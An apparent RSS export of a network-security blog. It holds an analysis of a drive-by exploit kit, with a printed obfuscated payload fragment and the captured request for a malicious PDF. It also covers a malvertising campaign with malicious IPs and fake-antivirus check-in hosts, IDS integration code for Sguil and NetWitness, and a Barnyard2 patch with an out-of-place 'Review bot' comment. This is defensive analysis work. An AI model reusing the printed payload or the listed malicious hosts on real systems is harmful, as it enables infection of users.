!f3e3a!#@~5e0!4#f578@4#b0!a!#@~bcb60!8@0!0!94#130!58@69a!#@~f1724#ba!#@~2a!#@~eef0!1ea!#@~2c4#cb790!ba!#@~b9bce8@68@260!2ff760!30!8@b6b390!0!e7df1cd0!4#354#f2a!#@~0!a!#@~7d0!c8@75fb4#1a!#@~4#4#557b38@0!18@b8@1f61e4#0!f933db66a!#@~0!7198@4#c778@ed4#d2dffcf67b1a!#@~99eefcc14#c8@0!8@4#4#4#16fda!#@~c30!530!a!#@~1de4#4#0!c68@8@9de3d4#1db5d18@d235d5e5d5a!#@~23ca!#@~1b0!efb8@9d8@25a!#@~e73b4#da!#@~8@a!#@~551210!3cef5bf674#91bb9ca!#@~d0!f8@98@24#6cc2698@2dc64#ebdd5d7bbbf27f5a!#@~d24#b0!e3d62f1a!#@~c20!4#54#e2ffa!#@~3d98@a!#@~4#d8@0!9ba!#@~ca!#@~b7dd528@b8@4#6b76a!#@~b28@3de16c0!25767e7f128@d259f
5e62fcfcd7c3d37a!#@~98@dd9a!#@~b94#1bfa!#@~d72ced6598@0!60!7eb13f5d8@568@5f996b3fbd12cc161ba!#@~3563d4#8@613c4#4#765e6d58@3fc6b3a!#@~f2e14#fca!#@~a!#@~ef7592f18@de28@4#c8@9bbe8@f3c98@9c4#4#674#728@8@75eb4#960!f21f29ed25e8@0!b0!2a!#@~74#fe7cc11c778@5d393a!#@~94#73d1a!#@~b6c3a!#@~ded8@1f0!c7593e8@9da!#@~9"&gt;
&lt;input type="hidden" id="ni" value="4"&gt;(GI)(VN)(_G)
&lt;/body&gt;
&lt;/html&gt;</pre>
<p>This will cause the client to now make a request for the malicious PDF:</p>
<pre>GET /ar/k_fgvu/_tvmwh.pdf HTTP/1.1
Accept: image/gif, image/jpeg, image/pjpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml+xml, application/vnd.ms-excel, application/vnd.ms-powerpoint, pplication/msword, */*
Referer: http://bbcxq.com/ar/putyq.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; &lt;REMOVED&gt;)
Host: bbcxq.com
Connection: Keep-Alive</pre>
<p>If the client is vulnerable to the contents of this PDF, it may become infected, depending on the actual payload being served up by the drive-by site. Whether the infection succeeds generally depends upon the antivirus signatures for the current malware being distributed; unfortunately the detection rates are not nearly as high as you may think:<br />
<a href="http://www.virustotal.com/estadisticas.html">http://www.virustotal.com/estadisticas.html</a></p>
<p>Hopefully if you have read this you have found it to be of some use.</p>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=177</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Massive Advertising Server Compromise/Socially Engineered By The RBN</title>
		<link>http://trojanedbinaries.com/blog/?p=167</link>
		<comments>http://trojanedbinaries.com/blog/?p=167#comments</comments>
		<pubDate>Wed, 03 Mar 2010 03:06:55 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[IDS]]></category>
		<category><![CDATA[Malvertising]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=167</guid>
		<description><![CDATA[<p>We have identified several major websites (buy.com, cnbc.com, digg.com, evite.com and msn.com just to name a few) using the advertising services of malicious servers that are using Acrobat PDF and Java exploits to force the download and installation of fake antivirus software. Analysis from SysAdMini @ www.malwaredomainlist.com has informed us the sites are all using the [...]]]></description>
			<content:encoded><![CDATA[<p>We have identified several major websites (buy.com, cnbc.com, digg.com, evite.com and msn.com just to name a few) using the advertising services of malicious servers that are using Acrobat PDF and Java exploits to force the download and installation of fake antivirus software. Analysis from SysAdMini @ <a href="http://www.malwaredomainlist.com/">www.malwaredomainlist.com</a> has informed us the sites are all using the NeoSploit drive-by kit. After further research, we found that Jiri Sejtko from <a href="http://www.avast.com">Avast!</a> has actually documented this and <a href="http://blog.avast.com/2010/02/18/ads-poisoning-%e2%80%93-jsprontexi/">written up a great blog entry</a> about this back on Feb 18th, 2010. It is unbelievable that online advertisers the likes of yieldmanager.com, fimserve.com, advertangel.com, bannerimg.com, jambovideonetwork.com, myspace.com, zedo.com, vestraff.com and others allowed this to occur and even thrive for the better part of a month. The host names hosting the drive-by and fake antivirus software that we have discovered so far are:</p>
<p>All of these host names resolved to the following IP addresses at this time:</p>
<pre>69.174.245.147
69.174.245.148
69.174.245.150
72.51.41.155
75.125.183.50
174.142.53.148</pre>
<p>We have been observing this for a few days and have been checking our repository of traffic and this goes back even further than Feb 15th, 2010. The signature that will trip on the download of the malware more often than not is this one:</p>
<p>ET POLICY Binary Download Smaller than 1 MB Likely Hostile<br />
<a href="http://doc.emergingthreats.net/2007671">http://doc.emergingthreats.net/2007671</a></p>
<p>Once a client is infected, the following signatures trip:</p>
<p>ET TROJAN Potential FakeAV HTTP GET Check-IN (/check)<br />
<a href="http://doc.emergingthreats.net/2010597">http://doc.emergingthreats.net/2010597</a></p>
<p>ET TROJAN Potential FakeAV HTTP POST Check-IN (?r=)<br />
<a href="http://doc.emergingthreats.net/2010594">http://doc.emergingthreats.net/2010594</a></p>
<p>ET USER_AGENTS Suspicious User Agent (Microsoft Internet Explorer)<br />
<a href="http://doc.emergingthreats.net/2002400">http://doc.emergingthreats.net/2002400</a></p>
<p>The infected client will attempt to check in to the following IP addresses/hostnames:</p>
<p>79.135.152.5 &#8211; avgroupwebsite.com<br />
195.88.190.54 &#8211; av-command.com/av-crew.net</p>
<p>This campaign seems to have been very effective and we know of thousands of hosts that have been exploited by this campaign.</p>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=167</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>Integrating NetWitness and Sguil &#8211; Take Two</title>
		<link>http://trojanedbinaries.com/blog/?p=158</link>
		<comments>http://trojanedbinaries.com/blog/?p=158#comments</comments>
		<pubDate>Fri, 15 Jan 2010 23:45:50 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[NetWitness]]></category>
		<category><![CDATA[Sguil]]></category>
		<category><![CDATA[integrate]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=158</guid>
		<description><![CDATA[<p>We have finished up our first round of testing against the modified version of the Sguil client (we have modified the 0.7.0 CVS version). Using the alert information displayed in the Sguil client we create a query and feed it into the NetWitness API through a vbscript which calls explorer.exe and passes it a NetWitness [...]]]></description>
			<content:encoded><![CDATA[<p>We have finished up our first round of testing against the modified version of the Sguil client (we have modified the 0.7.0 CVS version). Using the alert information displayed in the Sguil client, we create a query and feed it into the <a href="http://www.netwitness.com/products/apisdk.aspx">NetWitness API</a> through a VBScript which calls explorer.exe and passes it a NetWitness URL. When you install NetWitness Investigator, it registers nw://&lt;url&gt; as a protocol handler within the OS. This URL is the API/method by which you can use alerts from other products to find specific sessions, IPs or timeframes of traffic to review, in any combination.</p>
<p>To do this, we first modified the Xscript section of sguil.tk and removed the transcript and wireshark options as we are now relying upon NetWitness for pcap capture instead of daemonlogger/sancp/tcpdump etc:</p>
<pre># Xscript Menu
set eventIDMenut [ menu .eventIDMenut -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
  -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
$eventIDMenut add command -label "Event History" -command "GetEventHistory"
$eventIDMenut add command -label "NetWitness Src -&gt; Dst" -command "NetWitnessEvent from"
$eventIDMenut add command -label "NetWitness Dst -&gt; Src" -command "NetWitnessEvent to"</pre>
<p>You can see that we are calling the command NetWitnessEvent and passing it a value of from or to. The reason for this is that triggered events list the source and destination IP address of the particular packet that caused the alert; however, NetWitness is session aware, so you may need to query using the source address as the destination and vice versa. This calls the NetWitnessEvent function that we have added to lib/extdata.tcl:</p>
<pre>proc NetWitnessEvent { direction } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    }   
    set future [clock scan "2 minute" -base [clock scan $timestamp -gmt 1]]
    set past   [clock scan "-2 minute" -base [clock scan $timestamp -gmt 1]]
    set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set future [regsub -all -expanded {[\:]} $future {%3A}]
    set past [regsub -all -expanded {[\:]} $past {%3A}]
    if { $proto == "6" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP%3A$dstPort&amp;time=$past+to+$future&amp;view=session&amp;where=ip.src%3D$srcIP+%26%26+tcp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+tcp.dstport%3D$dstPort"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=TCP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP%3A$srcPort&amp;time=$past+to+$future&amp;view=session&amp;where=ip.src%3D$dstIP+%26%26+tcp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+tcp.dstport%3D$srcPort"
        }
    }
    if { $proto == "17" } {
     if { $direction == "from" } {
         exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$srcIP%3A$srcPort+-%3E+$dstIP+%3A+$dstPort&amp;time=$past+to+$future&amp;view=session&amp;where=ip.src%3D$srcIP+%26%26+udp.srcport%3D$srcPort+%26%26+ip.dst%3D$dstIP+%26%26+udp.dstport%3D$dstPort"
     }
     if { $direction == "to" } {
         exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=UDP+%7C%7C+$dstIP%3A$dstPort+-%3E+$srcIP+%3A+$srcPort&amp;time=$past+to+$future&amp;view=session&amp;where=ip.src%3D$dstIP+%26%26+udp.srcport%3D$dstPort+%26%26+ip.dst%3D$srcIP+%26%26+udp.dstport%3D$srcPort"
     }
    }
    if { $proto == "1" } {
        if { $direction == "from" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$srcIP+-%3E+$dstIP&amp;time=$past+to+$future&amp;view=session&amp;where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP+%26%26+ip.proto%3D1"
        }
        if { $direction == "to" } {
            exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ICMP+%7C%7C+$dstIP+-%3E+$srcIP&amp;time=$past+to+$future&amp;view=session&amp;where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP+%26%26+ip.proto%3D1"
        }
    }
}</pre>
<p>This function will create different queries based upon protocol type (TCP/UDP/ICMP only currently) and use the source/destination address and source/destination port. It will look for sessions that match those specific values and then automatically open them in NetWitness Investigator:</p>
<p style="TEXT-ALIGN: center"><img class="size-full wp-image-159  aligncenter" title="sguilNetwitness1" src="http://trojanedbinaries.com/blog/wp-content/uploads/2010/01/sguilNetwitness1.jpg" alt="sguilNetwitness1" width="800" height="96" /></p>
<p>To replicate the SANCP session type queries, we again modify sguil.tk but this time we modify the IPQuery Menu section:</p>
<pre># IPQuery Menu
set ipQueryMenu [ menu .ipQueryMenu -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND \
  -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND -tearoff 0 ]
.ipQueryMenu add cascade -label "Quick Query" -menu $ipQueryMenu.quickMenu
.ipQueryMenu add cascade -label "Advanced Query" -menu $ipQueryMenu.advancedMenu
.ipQueryMenu add cascade -label "Dshield IP Lookup" -menu $ipQueryMenu.dshieldIPMenu
.ipQueryMenu add cascade -label "Nessus Report Lookup" -menu $ipQueryMenu.nessusMenu
.ipQueryMenu add cascade -label "NetWitness Query" -menu $ipQueryMenu.netwitnessMenu

menu $ipQueryMenu.quickMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.advancedMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.dshieldIPMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.nessusMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND
menu $ipQueryMenu.netwitnessMenu -tearoff 0 -background $SELECTBACKGROUND -foreground $SELECTFOREGROUND -activeforeground $SELECTBACKGROUND -activebackground $SELECTFOREGROUND

$ipQueryMenu.netwitnessMenu add command -label "SrcIP/1 Hour"           -command "NetWitness Src 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/1 Hour"   -command "NetWitness SrcAsDst 1"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP/24 Hours"         -command "NetWitness Src 24"
$ipQueryMenu.netwitnessMenu add command -label "SrcIP(as Dst)/24 Hours" -command "NetWitness SrcAsDst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/1 Hour"           -command "NetWitness Dst 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/1 Hour"   -command "NetWitness DstAsSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "DstIP/24 Hours"         -command "NetWitness Dst 24"
$ipQueryMenu.netwitnessMenu add command -label "DstIP(as Src)/24 Hours" -command "NetWitness DstAsSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/1 Hour"      -command "NetWitness SrcToDst 1"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/1 Hour"      -command "NetWitness DstToSrc 1"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/24 Hours"    -command "NetWitness SrcToDst 24"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/24 Hours"    -command "NetWitness DstToSrc 24"
$ipQueryMenu.netwitnessMenu add command -label "Src To Dst/5 Days"      -command "NetWitness SrcToDst 120"
$ipQueryMenu.netwitnessMenu add command -label "Dst To Src/5 Days"      -command "NetWitness DstToSrc 120"
foreach { currentMenu subcommand } { .ipQueryMenu.quickMenu "quick" .ipQueryMenu.advancedMenu "build" } {
....truncated for brevity, everything below should be as it was when you checked it out of CVS...</pre>
<p>You can see we are calling a proc/function called NetWitness and passing it a variable for which address(es) we are interested in (and whether they are source or destination addresses) along with some predefined time periods. You have much better flexibility and control if you create these queries within NetWitness directly, but just being able to right click makes for greater ease of use for analysts. This calls the NetWitness proc that we have added to lib/extdata.tcl:</p>
<pre>proc NetWitness { direction hours } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
    set cnxID [lindex $sidcidList 1]
    set sensorID [lindex $sidcidList 0]
    set proto [$CUR_SEL_PANE(name) getcells $selectedIndex,ipproto]
    set srcIP [$CUR_SEL_PANE(name) getcells $selectedIndex,srcip]
    set srcPort [$CUR_SEL_PANE(name) getcells $selectedIndex,srcport]
    set dstIP [$CUR_SEL_PANE(name) getcells $selectedIndex,dstip]
    set dstPort [$CUR_SEL_PANE(name) getcells $selectedIndex,dstport]
    if { $CUR_SEL_PANE(format) == "SSN" } {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,starttime]
    } else {
       set timestamp [$CUR_SEL_PANE(name) getcells $selectedIndex,date]
    } 
    if {$hours == 1} {
     set future [clock scan "30 minute" -base [clock scan $timestamp -gmt 1]]
     set past   [clock scan "-30 minute" -base [clock scan $timestamp -gmt 1]]
    } else {
     set hours [expr $hours / 2]
     set future [clock scan "$hours hour" -base [clock scan $timestamp -gmt 1]]
     set past   [clock scan "-$hours hour" -base [clock scan $timestamp -gmt 1]]
    }
    set future [clock format $future -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set past [clock format $past -format {%Y-%m-%d+%H:%M:%S} -gmt 1]
    set future [regsub -all -expanded {[\:]} $future {%3A}]
    set past [regsub -all -expanded {[\:]} $past {%3A}]   
    if { $direction == "Src" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$srcIP&amp;time=$past+to+$future&amp;where=ip.src%3D$srcIP"
    }
    if { $direction == "SrcAsDst" } {
        exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$srcIP&amp;time=$past+to+$future&amp;where=ip.dst%3D$srcIP"
    }
    if { $direction == "Dst" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.dst%3D$dstIP&amp;time=$past+to+$future&amp;where=ip.dst%3D$dstIP"
    }
    if { $direction == "DstAsSrc" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=ip.src%3D$dstIP&amp;time=$past+to+$future&amp;where=ip.src%3D$dstIP"
    }
    if { $direction == "SrcToDst" } {
     exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$srcIP+-%3E+$dstIP&amp;time=$past+to+$future&amp;where=ip.src%3D$srcIP+%26%26+ip.dst%3D$dstIP"
    }
    if { $direction == "DstToSrc" } {
         exec wscript c:/users/analyst/nw.vbs "nw://broker/?name=$dstIP+-%3E+$srcIP&amp;time=$past+to+$future&amp;where=ip.src%3D$dstIP+%26%26+ip.dst%3D$srcIP"
    }
}</pre>
<p>Now we can right click on IP&#8217;s within Sguil and use the alert data to perform these SANCP queries into NetWitness as shown below:</p>
<p style="TEXT-ALIGN: center"><img class="size-full wp-image-160  aligncenter" title="sguilNetwitness2" src="http://trojanedbinaries.com/blog/wp-content/uploads/2010/01/sguilNetwitness2.jpg" alt="sguilNetwitness2" width="800" height="398" /></p>
<p>You may have noticed that the nw://&lt;url&gt;&#8217;s are being passed to a Visual Basic script entitled nw.vbs within the analyst account&#8217;s home directory. We had some issues with executing long commands from within TCL and ran into 8.3 filename limitations as well. The vbscript is very simple and uses the Run method to execute explorer.exe while passing it the URL we have formed to perform the query in NetWitness Investigator. If NetWitness Investigator is not running, it will open up and prompt you for your authentication credentials. Additionally, if it is already open it will just create a tab in the Investigator and display the sessions/reports. The contents of the nw.vbs file are as follows; it may look weird, but you have to escape quotes with quotes when you do VB scripting, so it looks like you have gone quote crazy:</p>
<pre>Set objShell = Wscript.CreateObject("Wscript.Shell")
Set ArgObj = WScript.Arguments

Cmd = """" &amp; "c:\windows\system32\explorer.exe" &amp; """" &amp; " " &amp; """" &amp; WScript.Arguments.Item(0) &amp; """"

objShell.Run Cmd</pre>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=158</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Fixing Barnyard2 Duplicate Database Entries With Sguil Output</title>
		<link>http://trojanedbinaries.com/blog/?p=149</link>
		<comments>http://trojanedbinaries.com/blog/?p=149#comments</comments>
		<pubDate>Sat, 12 Dec 2009 03:53:42 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[Barnyard2]]></category>
		<category><![CDATA[Sguil]]></category>
		<category><![CDATA[duplicate]]></category>
		<category><![CDATA[patch]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=149</guid>
		<description><![CDATA[<p>Well the good folks over at SecurixLive.com have already fixed this and a few other little things and rolled it into their latest release of Barnyard2 v1.8-beta1. Go and get it!</p>
<p>We have identified an issue with Barnyard2 version 1.7 build 255 that causes duplicate entries to be created in the Sguil database. The issue was that the [...]]]></description>
			<content:encoded><![CDATA[<p>Well the good folks over at <a href="http://www.securixlive.com">SecurixLive.com</a> have already fixed this and a few other little things and rolled it into their latest release of <a href="http://www.securixlive.com/barnyard2/download.php">Barnyard2 v1.8-beta1</a>. Go and get it!</p>
<p>We have identified an issue with <a href="http://www.securixlive.com/barnyard2/index.php">Barnyard2</a> version 1.7 build 255 that causes duplicate entries to be created in the <a href="http://sguil.sourceforge.net">Sguil</a> database. The issue is that the entries in the unified2 output from <a href="http://www.snort.org">Snort</a> are read into two separate lists (<code>AlertList</code> and <code>LogList</code>) as the unified2 log file is processed. Elsewhere in the Barnyard2 code, all the relevant information is stored into a buffer for creating the Sguil database entry for the alert (summary of event) and the log (offending packet) prior to firing off the output logging. The debugging output shows that the <code>SPECIAL</code> style output is going to be used for the event/packet combo that was pulled out of the unified2 output file:</p>
<pre>spi_unified2.c:151: Header: Type=7 (52 bytes)
spi_unified2.c:159: Reading record type=7 (52 bytes)
spi_unified2.c:320: Type: Event -------------------------------------------
spi_unified2.c:322:   sensor_id          = 0
spi_unified2.c:324:   event_id           = 4
spi_unified2.c:326:   event_second       = 1260520646
spi_unified2.c:328:   event_microsecond  = 383469
spi_unified2.c:330:   generator_id       = 1
spi_unified2.c:332:   signature_id       = 2009236
spi_unified2.c:334:   signature_revision = 5
spi_unified2.c:336:   classification_id  = 21
spi_unified2.c:338:   priority_id        = 1
spi_unified2.c:353:   ip_source          = 192.168.1.5
spi_unified2.c:356:   sport_itype        = 57019
spi_unified2.c:359:   ip_destination     = 71.191.147.210
spi_unified2.c:361:   dport_icode        = 80
spi_unified2.c:364:   ip_protocol        = 6
spi_unified2.c:366:   packet_action      = 0
spi_unified2.c:151: Header: Type=2 (244 bytes)
spi_unified2.c:159: Reading record type=2 (244 bytes)
spi_unified2.c:403: Type: Packet ------------------------------------------
spi_unified2.c:405:   sensor_id          = 0
spi_unified2.c:407:   event_id           = 4
spi_unified2.c:409:   event_second       = 1260520646
spi_unified2.c:411:   linktype           = 1
spi_unified2.c:413:   packet_second      = 1260520646
spi_unified2.c:415:   packet_microsecond = 383469
spi_unified2.c:417:   packet_length      = 216
spi_unified2.c:422:   packet             = 18 01 bb 24
decode.c:113: Decoding linktype 1
decode.c:314: Packet!
decode.c:314: caplen: 216    pktlen: 216
decode.c:341: 0:21:9B:69:E0:9 -&gt; 0:18:1:BB:24:4F
decode.c:345: type:0x800 len:0xD8
decode.c:355: IP datagram size calculated to be 202 bytes
decode.c:2648: Packet!
decode.c:2822: IP Checksum: OK
decode.c:2899: IP header length: 20
decode.c:3023: TCP th_off is 5, passed len is 182
decode.c:3103: TCP Checksum: OK
decode.c:3107: tcp header starts at: 0x80dcd9e
spooler.c:655: Firing SPECIAL style (Packet+Event)</pre>
<p>So the debugging shows us only firing off once with <code>SPECIAL</code> style (Packet+Event). But if we look at the output presented to <code>STDOUT</code>, we see that the same alert is inserted twice into the Sguil server (we have omitted packet contents for brevity):</p>
<pre>sguil: sending "RTEVENT 0 1 199 sguil 4 4 {2009-12-11 03:37:26} 1 2009236 5 {ET USER_AGENTS Pigeon.AYX/AVKill Related User-Agent (CTTBasic) } {2009-12-11 03:37:26} 1 trojan-activity 3232235781 192.168.1.5 1203737554 71.191.147.210 6 4 5 0 202 2472 2 0 128 21319 {} {} {} {} {} 57019 80 309364297 2715104879 5 0 24 16425 7600 0 {} {}"
sguil: Received: Confirm 199
sguil: sending "RTEVENT 0 1 200 sguil 4 4 {2009-12-11 03:37:26} 1 2009236 5 {ET USER_AGENTS Pigeon.AYX/AVKill Related User-Agent (CTTBasic) } {2009-12-11 03:37:26} 1 trojan-activity 3232235781 192.168.1.5 1203737554 71.191.147.210 6 4 5 0 202 2472 2 0 128 21319 {} {} {} {} {} 57019 80 309364297 2715104879 5 0 24 16425 7600 0 {} {}"
sguil: Received: Confirm 200</pre>
<p>So this led us to inspect <code>src/spooler.c</code>, which led us to the <code>CallOutputPlugins()</code> function in <code>src/plugbase.c</code>. While reviewing it, we noticed that if <code>OUTPUT_TYPE__SPECIAL</code> (which Sguil uses) is set, then it will process <code>idx-&gt;func()</code> once for the entry in the <code>AlertList</code> and once for the <code>LogList</code>:</p>
<pre><tt>void CallOutputPlugins(OutputType out_type, Packet *packet, void *event, uint32_t event_type)
{
    OutputFuncNode *idx = NULL;

    if (out_type == OUTPUT_TYPE__SPECIAL)
    {
        idx = AlertList;
        while (idx != NULL)
        {
            idx-&gt;func(packet, event, event_type, idx-&gt;arg);
            idx = idx-&gt;next;
        }

        idx = LogList;
        while (idx != NULL)
        {
            idx-&gt;func(packet, event, event_type, idx-&gt;arg);
            idx = idx-&gt;next;
        }
    }</tt></pre>
<p>So if we remove the processing the second time around for the <code>LogList</code>, we are able to stop the double entries from being created in the database. Below is what the patch (which you can <a href="wp-content/uploads/2009/12/plugbase.c.patch">download here</a>) looks like. Obviously, you can just delete the lines with the single minus sign in front of them that are located within the <code>CallOutputPlugins()</code> function of <code>src/plugbase.c</code>:</p>
<pre>--- plugbase.c  2009-10-17 06:08:55.000000000 -0400
+++ plugbase.c.new      2009-12-11 21:59:22.000000000 -0500
@@ -543,13 +543,6 @@
                idx-&gt;func(packet, event, event_type, idx-&gt;arg);
                idx = idx-&gt;next;
        }
-
-        idx = LogList;
-       while (idx != NULL)
-       {
-               idx-&gt;func(packet, event, event_type, idx-&gt;arg);
-               idx = idx-&gt;next;
-       }
     }
     else
     {</pre>
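<p>Review bot: removing the whole <code>LogList</code> pass for <code>OUTPUT_TYPE__SPECIAL</code> silences the duplicate, but it also means any output plugin that is registered only on <code>LogList</code> is never called for a SPECIAL event; the double insert comes from the Sguil plugin sitting on both lists, so a narrower change is to keep the second loop and skip any <code>idx-&gt;func</code> that was already invoked from the <code>AlertList</code> loop in the context above (or register the Sguil plugin on one list only). The hunk should also say in a comment why SPECIAL now only walks <code>AlertList</code>, otherwise the next reader will see the <code>else</code> branch still walking both and assume an omission.</p>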
<p>To apply the patch, move it to the <code>src/</code> directory within the Barnyard2 v 1.7 distribution directory and perform the following then compile/install as normal:</p>
<pre>#patch plugbase.c &lt; plugbase.c.patch</pre>
<p>Another thing we discovered during the troubleshooting process was how to enable debugging within Barnyard2. You must first compile it with the <code>--enable-debug</code> option, then prior to running it you must set the environment variable <code>BARNYARD2_DEBUG</code> to one of the numbers listed in <code>src/debug.h</code> (if you want everything, and that IS a lot, just do <code>export BARNYARD2_DEBUG=4294967295</code>).</p>
]]></content:encoded>
			<wfw:commentRss>http://trojanedbinaries.com/blog/?feed=rss2&amp;p=149</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Integrating NetWitness and Sguil &#8211; Take One</title>
		<link>http://trojanedbinaries.com/blog/?p=143</link>
		<comments>http://trojanedbinaries.com/blog/?p=143#comments</comments>
		<pubDate>Tue, 08 Dec 2009 10:41:25 +0000</pubDate>
		<dc:creator>Eoin Miller</dc:creator>
				<category><![CDATA[NetWitness]]></category>
		<category><![CDATA[Sguil]]></category>
		<category><![CDATA[integrate]]></category>

		<guid isPermaLink="false">http://trojanedbinaries.com/blog/?p=143</guid>
		<description><![CDATA[<p>We will be deploying NetWitness soon and we have been looking for how to leverage it for the packet capture portion of our new centralized Sguil deployment instead of sancp or daemonlogger. We have come up with a way, albeit a bit hackish, of modifying the Sguil client to allow you to view [...]]]></description>
			<content:encoded><![CDATA[<p>We will be deploying <a href="http://www.netwitness.com">NetWitness</a> soon and we have been looking for how to leverage it for the packet capture portion of our new centralized <a href="http://sguil.sourceforge.net/">Sguil</a> deployment instead of <a href="http://www.metre.net/sancp.html">sancp</a> or <a href="http://www.snort.org/users/roesch/Site/Daemonlogger/Daemonlogger.html">daemonlogger</a>. We have come up with a way, albeit a bit hackish, of modifying the Sguil client to allow you to view the pcap/session data from within NetWitness Investigator.</p>
<p>First, we modified client/sguil.tk and added the following line underneath the section of code notated by the comment <code># Xscript Menu</code>:</p>
<pre>$eventIDMenut add command -label "NetWitness" -command "NetWitness"</pre>
<p>This will provide us with a NetWitness menu option where you normally see your Wireshark and Get Transcript options within the Sguil client:</p>
<p style="TEXT-ALIGN: center"><img class="size-full wp-image-145  aligncenter" title="Sguil and NetWitness" src="http://trojanedbinaries.com/blog/wp-content/uploads/2009/12/SguilandNetWitness1.jpg" alt="Sguil and NetWitness" width="807" height="300" /></p>
<p>Now that we have that, we need code that will do something when this option is selected. For that we need to add the following to the end of the client/lib/extdata.tcl file:</p>
<pre>proc NetWitness { } {
    global ACTIVE_EVENT SERVERHOST XSCRIPT_SERVER_PORT DEBUG CUR_SEL_PANE XSCRIPTDATARCVD
    global socketWinName SESSION_STATE WIRESHARK_STORE_DIR WIRESHARK_PATH
    if {!$ACTIVE_EVENT} {return}
    set selectedIndex [$CUR_SEL_PANE(name) curselection]
    set sidcidList [split [$CUR_SEL_PANE(name) getcells $selectedIndex,alertID] .]
